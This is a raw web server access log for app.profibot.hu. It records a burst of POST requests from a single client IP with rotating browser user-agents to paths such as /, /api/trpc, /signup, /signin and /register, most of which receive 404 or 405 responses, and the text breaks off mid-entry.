"/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/api/trpc" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/api/trpc" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/api/trpc" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:54 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/api/trpc" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:54 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:55 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:55 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:55 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:55 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:55 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:55 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:55 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:55 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:55 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/register" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/register" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/register" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/register" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/register" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/register" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/signup" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:55 +0000] - 404 404 - POST https app.profibot.hu "/en" [Client 